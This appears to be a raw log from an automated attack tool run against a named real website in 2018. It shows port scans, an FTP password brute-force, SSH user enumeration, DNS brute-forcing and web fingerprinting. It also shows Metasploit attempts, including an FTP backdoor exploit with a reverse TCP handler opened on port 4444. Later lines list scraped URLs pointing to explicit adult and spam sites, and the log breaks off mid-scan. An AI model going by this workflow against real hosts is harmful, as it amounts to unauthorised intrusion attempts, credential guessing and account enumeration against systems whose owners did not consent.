  671. 123/udp open|filtered ntp
  672. 137/udp open|filtered netbios-ns
  673. 138/udp open|filtered netbios-dgm
  674. 139/udp open|filtered netbios-ssn
  675. 161/udp open|filtered snmp
  676. 162/udp open|filtered snmptrap
  677. 389/udp open|filtered ldap
  678. 520/udp open|filtered route
  679. 2049/udp open|filtered nfs
  680.  
  681. Nmap done: 1 IP address (1 host up) scanned in 4.79 seconds
  682. #######################################################################################################################################
  683. + -- --=[Port 21 opened... running tests...
  684. Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-15 19:27 EDT
  685. Nmap scan report for vcteens.com (108.59.1.220)
  686. Host is up (0.51s latency).
  687.  
  688. PORT STATE SERVICE VERSION
  689. 21/tcp open ftp ProFTPD or KnFTPD
  690. | ftp-brute:
  691. | Accounts: No valid accounts found
  692. |_ Statistics: Performed 3184 guesses in 353 seconds, average tps: 8.2
  693. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  694. Device type: WAP|general purpose
  695. Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 2.6.X (93%)
  696. OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:2.6
  697. Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 2.6.18 - 2.6.22 (93%)
  698. No exact OS matches for host (test conditions non-ideal).
  699. Network Distance: 1 hop
  700. Service Info: OS: Unix
  701.  
  702. TRACEROUTE (using port 21/tcp)
  703. HOP RTT ADDRESS
  704. 1 708.25 ms 108.59.1.220
  705.  
  706. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  707. Nmap done: 1 IP address (1 host up) scanned in 369.03 seconds
  708.  
  709.  
  710. .:okOOOkdc' 'cdkOOOko:.
  711. .xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
  712. :OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
  713. 'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  714. oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
  715. dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
  716. lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
  717. .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
  718. cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
  719. oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
  720. lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
  721. ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
  722. .dOOo'WM.OOOOocccxOOOO.MX'xOOd.
  723. ,kOl'M.OOOOOOOOOOOOO.M'dOk,
  724. :kk;.OOOOOOOOOOOOO.;Ok:
  725. ;kOOOOOOOOOOOOOOOk:
  726. ,xOOOOOOOOOOOx,
  727. .lOOOOOOOl.
  728. ,dOd,
  729. .
  730.  
  731. =[ metasploit v4.17.13-dev ]
  732. + -- --=[ 1808 exploits - 1028 auxiliary - 313 post ]
  733. + -- --=[ 539 payloads - 42 encoders - 10 nops ]
  734. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  735.  
  736. RHOST => vcteens.com
  737. RHOSTS => vcteens.com
  738. [+] 108.59.1.220:21 - FTP Banner: '220 FTP Server ready.\x0d\x0a'
  739. [*] vcteens.com:21 - Scanned 1 of 1 hosts (100% complete)
  740. [*] Auxiliary module execution completed
  741. #<Thread:0x000055b3b61386b0@/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:93 run> terminated with exception (report_on_exception is true):
  742. : SELECT "hosts".* FROM "hosts" WHERE "hosts"."workspace_id" = $1 AND "hosts"."address" = $2 ORDER BY "hosts"."id" ASC LIMIT 1
  743. [*] vcteens.com:21 - Scanned 1 of 1 hosts (100% complete)
  744. [*] Auxiliary module execution completed
  745. [*] vcteens.com:21 - Banner: 220 FTP Server ready.
  746. [*] vcteens.com:21 - USER: 331 Password required for HFpN7W:)
  747. [*] Exploit completed, but no session was created.
  748. [*] Started reverse TCP double handler on 10.211.1.185:4444
  749. [*] vcteens.com:21 - Sending Backdoor Command
  750. [-] vcteens.com:21 - Not backdoored
  751. [*] Exploit completed, but no session was created.
  752. + -- --=[Port 22 opened... running tests...
  753. # general
  754. (gen) banner: SSH-2.0-OpenSSH_5.3
  755. (gen) software: OpenSSH 5.3
  756. (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
  757. (gen) compression: enabled (zlib@openssh.com)
  758.  
  759. # key exchange algorithms
  760. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
  761. `- [info] available since OpenSSH 4.4
  762. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  763. `- [warn] using weak hashing algorithm
  764. `- [info] available since OpenSSH 2.3.0
  765. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
  766. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
  767. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  768. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
  769. `- [warn] using small 1024-bit modulus
  770. `- [warn] using weak hashing algorithm
  771. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  772.  
  773. # host-key algorithms
  774. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  775. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
  776. `- [warn] using small 1024-bit modulus
  777. `- [warn] using weak random number generator could reveal the key
  778. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  779.  
  780. # encryption algorithms (ciphers)
  781. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  782. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
  783. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  784. (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  785. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  786. `- [warn] using weak cipher
  787. `- [info] available since OpenSSH 4.2
  788. (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  789. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  790. `- [warn] using weak cipher
  791. `- [info] available since OpenSSH 4.2
  792. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  793. `- [warn] using weak cipher mode
  794. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  795. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  796. `- [warn] using weak cipher
  797. `- [warn] using weak cipher mode
  798. `- [warn] using small 64-bit block size
  799. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  800. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  801. `- [fail] disabled since Dropbear SSH 0.53
  802. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  803. `- [warn] using weak cipher mode
  804. `- [warn] using small 64-bit block size
  805. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  806. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  807. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  808. `- [warn] using weak cipher mode
  809. `- [warn] using small 64-bit block size
  810. `- [info] available since OpenSSH 2.1.0
  811. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  812. `- [warn] using weak cipher mode
  813. `- [info] available since OpenSSH 2.3.0
  814. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  815. `- [warn] using weak cipher mode
  816. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
  817. (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  818. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  819. `- [warn] using weak cipher
  820. `- [info] available since OpenSSH 2.1.0
  821. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  822. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  823. `- [warn] using weak cipher mode
  824. `- [info] available since OpenSSH 2.3.0
  825.  
  826. # message authentication code algorithms
  827. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  828. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  829. `- [warn] using encrypt-and-MAC mode
  830. `- [warn] using weak hashing algorithm
  831. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  832. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
  833. `- [warn] using weak hashing algorithm
  834. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  835. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
  836. `- [warn] using small 64-bit tag size
  837. `- [info] available since OpenSSH 4.7
  838. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
  839. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  840. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
  841. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  842. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  843. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  844. `- [warn] using encrypt-and-MAC mode
  845. `- [info] available since OpenSSH 2.5.0
  846. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  847. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  848. `- [warn] using encrypt-and-MAC mode
  849. `- [info] available since OpenSSH 2.1.0
  850. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  851. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  852. `- [warn] using encrypt-and-MAC mode
  853. `- [warn] using weak hashing algorithm
  854. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
  855. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  856. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  857. `- [warn] using encrypt-and-MAC mode
  858. `- [warn] using weak hashing algorithm
  859. `- [info] available since OpenSSH 2.5.0
  860.  
  861. # algorithm recommendations (for OpenSSH 5.3)
  862. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
  863. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
  864. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
  865. (rec) -ssh-dss -- key algorithm to remove
  866. (rec) -arcfour -- enc algorithm to remove
  867. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
  868. (rec) -blowfish-cbc -- enc algorithm to remove
  869. (rec) -3des-cbc -- enc algorithm to remove
  870. (rec) -aes256-cbc -- enc algorithm to remove
  871. (rec) -arcfour256 -- enc algorithm to remove
  872. (rec) -cast128-cbc -- enc algorithm to remove
  873. (rec) -aes192-cbc -- enc algorithm to remove
  874. (rec) -arcfour128 -- enc algorithm to remove
  875. (rec) -aes128-cbc -- enc algorithm to remove
  876. (rec) -hmac-md5-96 -- mac algorithm to remove
  877. (rec) -hmac-ripemd160 -- mac algorithm to remove
  878. (rec) -hmac-sha1-96 -- mac algorithm to remove
  879. (rec) -umac-64@openssh.com -- mac algorithm to remove
  880. (rec) -hmac-md5 -- mac algorithm to remove
  881. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
  882. (rec) -hmac-sha1 -- mac algorithm to remove
  883.  
  884. ftp is a valid user!
  885. mail is a valid user!
  886. mysql is a valid user!
  887. nobody is a valid user!
  888. postfix is a valid user!
  889. root is a valid user!
  890. Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-15 19:35 EDT
  891. Nmap scan report for vcteens.com (108.59.1.220)
  892. Host is up (0.080s latency).
  893.  
  894. PORT STATE SERVICE VERSION
  895. 22/tcp filtered ssh
  896. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  897. Device type: firewall|general purpose
  898. Running: Linux 2.4.X|2.6.X, ISS embedded
  899. OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
  900. OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
  901.  
  902. TRACEROUTE (using proto 1/icmp)
  903. HOP RTT ADDRESS
  904. 1 ... 30
  905.  
  906. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  907. Nmap done: 1 IP address (1 host up) scanned in 13.09 seconds
  908.  
  909. , ,
  910. / \
  911. ((__---,,,---__))
  912. (_) O O (_)_________
  913. \ _ / |\
  914. o_o \ M S F | \
  915. \ _____ | *
  916. ||| WW|||
  917. ||| |||
  918.  
  919.  
  920. =[ metasploit v4.17.13-dev ]
  921. + -- --=[ 1808 exploits - 1028 auxiliary - 313 post ]
  922. + -- --=[ 539 payloads - 42 encoders - 10 nops ]
  923. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  924.  
  925. USER_FILE => /brutex/wordlists/simple-users.txt
  926. RHOSTS => vcteens.com
  927. RHOST => vcteens.com
  928. ######################################################################################################################################
  929. Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-15 19:35 EDT
  930. Nmap scan report for vcteens.com (108.59.1.220)
  931. Host is up (0.10s latency).
  932.  
  933. PORT STATE SERVICE VERSION
  934. 53/tcp filtered domain
  935. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  936. Device type: firewall|general purpose
  937. Running: Linux 2.4.X|2.6.X, ISS embedded
  938. OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
  939. OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
  940.  
  941. Host script results:
  942. | dns-blacklist:
  943. | PROXY
  944. | dnsbl.tornevall.org - FAIL
  945. | SPAM
  946. |_ l2.apews.org - SPAM
  947. | dns-brute:
  948. | DNS Brute-force hostnames:
  949. | admin.vcteens.com - 108.59.1.220
  950. | mail.vcteens.com - 108.59.1.220
  951. | www.vcteens.com - 108.59.1.220
  952. |_ ftp.vcteens.com - 108.59.1.220
  953.  
  954. TRACEROUTE (using proto 1/icmp)
  955. HOP RTT ADDRESS
  956. 1 ... 30
  957. #######################################################################################################################################
  958. ERROR:root:Site http://vcteens.com appears to be down
  959.  
  960. ^ ^
  961. _ __ _ ____ _ __ _ _ ____
  962. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  963. | V V // o // _/ | V V // 0 // 0 // _/
  964. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  965. <
  966. ...'
  967.  
  968. WAFW00F - Web Application Firewall Detection Tool
  969.  
  970. By Sandro Gauci && Wendel G. Henrique
  971.  
  972. Checking http://vcteens.com
  973. #######################################################################################################################################
  974. http://vcteens.com [200 OK] Country[UNITED STATES][US], IP[108.59.1.220], Meta-Refresh-Redirect[https://guardian2.skbroadband.com?flag=D&uid=?&pid=0&cid=0&host=vcteens.com&uri=2f]
  975. https://guardian2.skbroadband.com?flag=D&uid=?&pid=0&cid=0&host=vcteens.com&uri=2f [200 OK] Apache, Country[KOREA REPUBLIC OF][KR], HTTPServer[Apache], IP[218.232.19.190], PHP[4,4.4,4.4.2], Script[text/javascript], X-Powered-By[PHP/4.4.2]
  976. #######################################################################################################################################
  977.  
  978. wig - WebApp Information Gatherer
  979.  
  980.  
  981. Scanning http://vcteens.com...
  982. __________________________________________ SITE INFO ___________________________________________
  983. IP Title
  984. 108.59.1.220 VCTeens.com - Teens Virtual Channel
  985.  
  986. ___________________________________________ VERSION ____________________________________________
  987. Name Versions Type
  988. Apache 2.0.61 | 2.0.62 | 2.0.63 | 2.0.64 | 2.0.65 | 2.2.10 | 2.2.11 Platform
  989. 2.2.12 | 2.2.13 | 2.2.14 | 2.2.15 | 2.2.16 | 2.2.17 | 2.2.18
  990. 2.2.19 | 2.2.20 | 2.2.21 | 2.2.22 | 2.2.23 | 2.2.24 | 2.2.25
  991. 2.2.26 | 2.2.27 | 2.2.28 | 2.2.29 | 2.2.6 | 2.2.7 | 2.2.8
  992. 2.2.9 | 2.3.0 | 2.3.1 | 2.3.10 | 2.3.11 | 2.3.12 | 2.3.13
  993. 2.3.14 | 2.3.15 | 2.3.16 | 2.3.2 | 2.3.3 | 2.3.4 | 2.3.5
  994. 2.3.6 | 2.3.7 | 2.3.8 | 2.3.9 | 2.4.0 | 2.4.1 | 2.4.10
  995. 2.4.11 | 2.4.12 | 2.4.2 | 2.4.3 | 2.4.4 | 2.4.5 | 2.4.6
  996. 2.4.7 | 2.4.8 | 2.4.9
  997. PHP 5.2.17 Platform
  998. nginx 1.9.5 Platform
  999. OpenBSD 4.9 OS
  1000.  
  1001. ________________________________________________________________________________________________
  1002. Time: 3.4 sec Urls: 953 Fingerprints: 40401
  1003. #######################################################################################################################################
  1004. HTTP/1.1 200 OK
  1005. Server: nginx/1.9.5
  1006. Date: Sat, 15 Sep 2018 21:47:47 GMT
  1007. Content-Type: text/html
  1008. Connection: keep-alive
  1009. X-Powered-By: PHP/5.2.17
  1010. #######################################################################################################################################
  1011. --------------------------------------------------------------------------------------------------------------------------------------
  1012.  
  1013. [ ! ] Starting SCANNER INURLBR 2.1 at [15-09-2018 19:37:54]
  1014. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  1015. It is the end user's responsibility to obey all applicable local, state and federal laws.
  1016. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1017.  
  1018. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-vcteens.com.txt ]
  1019. [ INFO ][ DORK ]::[ site:vcteens.com ]
  1020. [ INFO ][ SEARCHING ]:: {
  1021. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.sm ]
  1022.  
  1023. [ INFO ][ SEARCHING ]::
  1024. -[:::]
  1025. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  1026.  
  1027. [ INFO ][ SEARCHING ]::
  1028. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1029. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.lv ID: 003917828085772992913:gmoeray5sa8 ]
  1030.  
  1031. [ INFO ][ SEARCHING ]::
  1032. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1033.  
  1034. [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
  1035.  
  1036.  
  1037. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1038. |_[ + ] [ 0 / 100 ]-[19:38:18] [ - ]
  1039. |_[ + ] Target:: [ http://vcteens.com/ ]
  1040. |_[ + ] Exploit::
  1041. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1042. |_[ + ] More details:: / - / , ISP:
  1043. |_[ + ] Found:: UNIDENTIFIED
  1044.  
  1045. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1046. |_[ + ] [ 1 / 100 ]-[19:38:21] [ - ]
  1047. |_[ + ] Target:: [ https://vcteens.com/?p=1 ]
  1048. |_[ + ] Exploit::
  1049. |_[ + ] Information Server:: , , IP:108.59.1.220:443
  1050. |_[ + ] More details:: / - / , ISP:
  1051. |_[ + ] Found:: UNIDENTIFIED
  1052. |_[ + ] ERROR CONECTION:: OpenSSL SSL_connect: SSL_ERROR_SYSCALL in connection to vcteens.com:443
  1053.  
  1054. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1055. |_[ + ] [ 2 / 100 ]-[19:38:23] [ - ]
  1056. |_[ + ] Target:: [ https://vcteens.com/?p=2 ]
  1057. |_[ + ] Exploit::
  1058. |_[ + ] Information Server:: , , IP:108.59.1.220:443
  1059. |_[ + ] More details:: / - / , ISP:
  1060. |_[ + ] Found:: UNIDENTIFIED
  1061. |_[ + ] ERROR CONECTION:: OpenSSL SSL_connect: SSL_ERROR_SYSCALL in connection to vcteens.com:443
  1062.  
  1063. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1064. |_[ + ] [ 3 / 100 ]-[19:38:25] [ - ]
  1065. |_[ + ] Target:: [ https://vcteens.com/?p=3 ]
  1066. |_[ + ] Exploit::
  1067. |_[ + ] Information Server:: , , IP:108.59.1.220:443
  1068. |_[ + ] More details:: / - / , ISP:
  1069. |_[ + ] Found:: UNIDENTIFIED
  1070. |_[ + ] ERROR CONECTION:: OpenSSL SSL_connect: SSL_ERROR_SYSCALL in connection to vcteens.com:443
  1071.  
  1072. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1073. |_[ + ] [ 4 / 100 ]-[19:38:27] [ - ]
  1074. |_[ + ] Target:: [ https://vcteens.com/index.php?tag=anal ]
  1075. |_[ + ] Exploit::
  1076. |_[ + ] Information Server:: , , IP:108.59.1.220:443
  1077. |_[ + ] More details:: / - / , ISP:
  1078. |_[ + ] Found:: UNIDENTIFIED
  1079. |_[ + ] ERROR CONECTION:: OpenSSL SSL_connect: SSL_ERROR_SYSCALL in connection to vcteens.com:443
  1080.  
  1081. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1082. |_[ + ] [ 5 / 100 ]-[19:38:30] [ - ]
  1083. |_[ + ] Target:: [ https://vcteens.com/index.php?tag=group ]
  1084. |_[ + ] Exploit::
  1085. |_[ + ] Information Server:: , , IP:108.59.1.220:443
  1086. |_[ + ] More details:: / - / , ISP:
  1087. |_[ + ] Found:: UNIDENTIFIED
  1088. |_[ + ] ERROR CONECTION:: OpenSSL SSL_connect: SSL_ERROR_SYSCALL in connection to vcteens.com:443
  1089.  
  1090. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1091. |_[ + ] [ 6 / 100 ]-[19:38:32] [ - ]
  1092. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/signup.cgi ]
  1093. |_[ + ] Exploit::
  1094. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1095. |_[ + ] More details:: / - / , ISP:
  1096. |_[ + ] Found:: UNIDENTIFIED
  1097.  
  1098. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1099. |_[ + ] [ 7 / 100 ]-[19:38:34] [ - ]
  1100. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=222&trade=http://virginbell.com/ ]
  1101. |_[ + ] Exploit::
  1102. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1103. |_[ + ] More details:: / - / , ISP:
  1104. |_[ + ] Found:: UNIDENTIFIED
  1105.  
  1106. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1107. |_[ + ] [ 8 / 100 ]-[19:38:37] [ - ]
  1108. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=187&trade=http://19teenmovies.com ]
  1109. |_[ + ] Exploit::
  1110. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1111. |_[ + ] More details:: / - / , ISP:
  1112. |_[ + ] Found:: UNIDENTIFIED
  1113.  
  1114. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1115. |_[ + ] [ 9 / 100 ]-[19:38:39] [ - ]
  1116. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=202&trade=http://xbobsvideos.com/ ]
  1117. |_[ + ] Exploit::
  1118. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1119. |_[ + ] More details:: / - / , ISP:
  1120. |_[ + ] Found:: UNIDENTIFIED
  1121.  
  1122. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1123. |_[ + ] [ 10 / 100 ]-[19:38:41] [ - ]
  1124. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=78&trade=http://teenwi.com ]
  1125. |_[ + ] Exploit::
  1126. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1127. |_[ + ] More details:: / - / , ISP:
  1128. |_[ + ] Found:: UNIDENTIFIED
  1129.  
  1130. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1131. |_[ + ] [ 11 / 100 ]-[19:38:43] [ - ]
  1132. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=128&amp;trade=http://pillekosten.space/teranar/ ]
  1133. |_[ + ] Exploit::
  1134. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1135. |_[ + ] More details:: / - / , ISP:
  1136. |_[ + ] Found:: UNIDENTIFIED
  1137.  
  1138. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1139. |_[ + ] [ 12 / 100 ]-[19:38:46] [ - ]
  1140. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=112&trade=http://www.fucksuckteens.com ]
  1141. |_[ + ] Exploit::
  1142. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1143. |_[ + ] More details:: / - / , ISP:
  1144. |_[ + ] Found:: UNIDENTIFIED
  1145.  
  1146. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1147. |_[ + ] [ 13 / 100 ]-[19:38:48] [ - ]
  1148. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=193&trade=http://bestpornstarsex.com/ ]
  1149. |_[ + ] Exploit::
  1150. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1151. |_[ + ] More details:: / - / , ISP:
  1152. |_[ + ] Found:: UNIDENTIFIED
  1153.  
  1154. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1155. |_[ + ] [ 14 / 100 ]-[19:38:50] [ - ]
  1156. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=213&trade=http://drunkxparty.com/ ]
  1157. |_[ + ] Exploit::
  1158. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1159. |_[ + ] More details:: / - / , ISP:
  1160. |_[ + ] Found:: UNIDENTIFIED
  1161.  
  1162. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1163. |_[ + ] [ 15 / 100 ]-[19:38:53] [ - ]
  1164. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=96&trade=http://www.freshxxxflash.com ]
  1165. |_[ + ] Exploit::
  1166. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1167. |_[ + ] More details:: / - / , ISP:
  1168. |_[ + ] Found:: UNIDENTIFIED
  1169.  
  1170. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1171. |_[ + ] [ 16 / 100 ]-[19:38:55] [ - ]
  1172. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=128&amp;trade=http://pillolaprezzo.space/fluvoxamine/ ]
  1173. |_[ + ] Exploit::
  1174. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1175. |_[ + ] More details:: / - / , ISP:
  1176. |_[ + ] Found:: UNIDENTIFIED
  1177.  
  1178. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1179. |_[ + ] [ 17 / 100 ]-[19:38:57] [ - ]
  1180. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?id=143&trade=http://youteenclips.com/ ]
  1181. |_[ + ] Exploit::
  1182. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1183. |_[ + ] More details:: / - / , ISP:
  1184. |_[ + ] Found:: UNIDENTIFIED
  1185.  
  1186. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1187. |_[ + ] [ 18 / 100 ]-[19:39:00] [ - ]
  1188. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.tryteens.com/video/11112/mirabel2fyu/1008616/ ]
  1189. |_[ + ] Exploit::
  1190. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1191. |_[ + ] More details:: / - / , ISP:
  1192. |_[ + ] Found:: UNIDENTIFIED
  1193.  
  1194. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1195. |_[ + ] [ 19 / 100 ]-[19:39:02] [ - ]
  1196. |_[ + ] Target:: [ http://vcteens.com/rt/engine/thumb.php?l=tmx5x112x7152&s=60&u=http://galleries.whiteteensblackcocks.com/video/11309/ashtonghj/1008616/ ]
  1197. |_[ + ] Exploit::
  1198. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1199. |_[ + ] More details:: / - / , ISP:
  1200. |_[ + ] Found:: UNIDENTIFIED
  1201.  
  1202. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1203. |_[ + ] [ 20 / 100 ]-[19:39:05] [ - ]
